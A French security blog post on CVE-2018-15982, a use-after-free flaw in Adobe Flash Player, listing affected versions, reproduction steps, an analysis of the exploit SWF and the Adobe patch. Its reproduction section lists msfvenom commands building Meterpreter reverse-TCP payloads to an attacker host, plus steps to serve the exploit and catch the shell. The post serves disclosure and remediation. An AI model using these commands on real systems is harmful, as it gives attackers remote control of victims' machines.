ENCORE une vulnérabilité découverte sur Adobe Flash. En effet une vulnérabilité (qualifiée de critique par Adobe et référencé CVE-2018-15982) de type user-after-free a été découverte par Applied Threat Research (ATR) et Qihoo 360 .
Une vulnérabilité de type use-after-free est identifié lorsqu’un programme souhaite utiliser un pointeur qui pointe vers une zone mémoire qui a été libérée. Autrement dit, le pointeur utilisé par le programme va aller chercher une information dans une zone mémoire qui, entre temps, a pu être allouée à un autre programme et donc potentiellement sous le contrôle d’un attaquant. Dans la plupart du temps, cela peut provoquer un crash de l’application (buffer overflow), une élévation de privilège ou peut amener à une exécution de code arbitraire (RCE).
Les versions suivantes sont affectées:
- Adobe Flash Player Desktop Runtime versions 31.0.0.153 et antérieures sur Windows, macOS et Linux
- Adobe Flash Player pour Google Chrome versions 31.0.0.153 et antérieures sur Windows, macOS, Linux et Chrome OS
- Adobe Flash Player pour Microsoft Edge et Internet Explorer 11 versions 31.0.0.153 et antérieures sur Windows 10 et 8.1
- Adobe Flash Player Installer versions 31.0.0.108 et antérieures sur Windows
Vidéo : Comment exploiter cette vulnérabilité ?
Reproduction de la vulnérabilité
Liste des commandes utilisées :
$msfvenom -p windows/metepreter_reserve_tcp_rc4 LHOST=IpAdress LPORT=Port -f raw > 86.bin
$msfvenom -p windows/metepreter_reserve_tcp_rc4 LHOST=IpAdress LPORT=Port -f raw > 64.bin
$python CVE-2018-15982.py -i 86.bin -I 64.bin
$python -m SimpleHTTPServer Port
$msfconsole
Analyse de l’exploit
La vulnérabilité 0day de type user-after-free a été identifiée dans la bibliothèque : com.adobe.tvsdk.mediacore.metadata.
Dans la vidéo, l’exécution du script python (POC de la vulnérabilité) a généré 2 fichiers, un fichier exploit.swf et un fichier html.
Avec le logiciel Sothink SWF Decompiler j’ai pu effectuer une Rétro-ingénierie du fichier exploit.swf pour retrouver son code source de base afin de sortir la bibliothèque responsable de la vulnérabilité sur Adobe Flash.
Vue de l’exploit malveillant SWF avec AutoScript
Quand un utilisateur visite le lien infecté de l’attaquant, le backdoor va silencieusement s’intégrer dans les processus du système. Cette image illustre le processus impliqué dans l’attaque.
L’arrêt de processus du backdoor va automatiquement interrompre l’interaction de l’attaquant avec la machine infectée.
Comment corriger cette vulnérabilité ?
La vulnérabilité est suffisamment critique pour qu’Adobe publie immédiatement un correctif de sécurité. Sur Windows, il est téléchargeable par Windows Update.
Veuillez-vous référer au bulletin de sécurité d’Adobe pour l’obtention des correctifs :
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
Source : https://bit.ly/2RTVlQ7
